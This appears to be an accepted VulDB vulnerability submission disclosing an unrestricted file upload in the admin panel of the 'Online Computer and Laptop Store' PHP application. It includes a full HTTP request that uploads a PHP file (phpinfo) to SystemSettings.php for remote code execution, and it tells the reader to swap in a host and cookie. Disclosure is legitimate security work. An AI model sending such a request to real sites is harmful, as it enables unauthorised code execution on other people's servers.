Submission #109687: Online Computer and Laptop Store Background RCE
Info

Title: Online Computer and Laptop Store Background RCE
Description:
Brief description: Online Computer and Laptop Store Background RCE

Reason: After uploading the file in the background code php-ocls\admin\system_info\index.php and clicking upload, the specific execution code location is: php-ocls\classes\SystemSettings.php. There is no limit, just upload php directly to cause the execution file of RCE.

Payload: Just modify the host and cookie in the payload.
---------------------------------------------------------------------------------------------------------------------------
POST /php-ocls/classes/SystemSettings.php?f=update_settings HTTP/1.1
Host: 192.168.5.139
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:107.0) Gecko/20100101 Firefox/107.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=---------------------------107417980941863249932677197760
Content-Length: 185
Origin: http://localhost
Connection: keep-alive
Referer: http://localhost/php-ocls/admin/?page=system_info
Cookie: PHPSESSID=pu8agldg93unebq0kmn6upugn3
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin

-----------------------------107417980941863249932677197760
Content-Disposition: form-data; name="img"; filename="1.php"
Content-Type: application/octet-stream

<?php phpinfo();?>
---------------------------------------------------------------------------------------------------------------------------
Source: ⚠️ www.sourcecodester.com/php/16397/online-computer-and-laptop-store-using-php-and-mysql-source-code-free-download.html
User: jsbae3449 (UID 30775)
Submission: 03/04/2023 06:11 PM (3 years ago)
Moderation: 04/04/2023 10:36 AM (16 hours later)
Status: Accepted
VulDB Entry: 224841 [SourceCodester Online Computer and Laptop Store 1.0 index.php img privilege escalation]
Points: 17
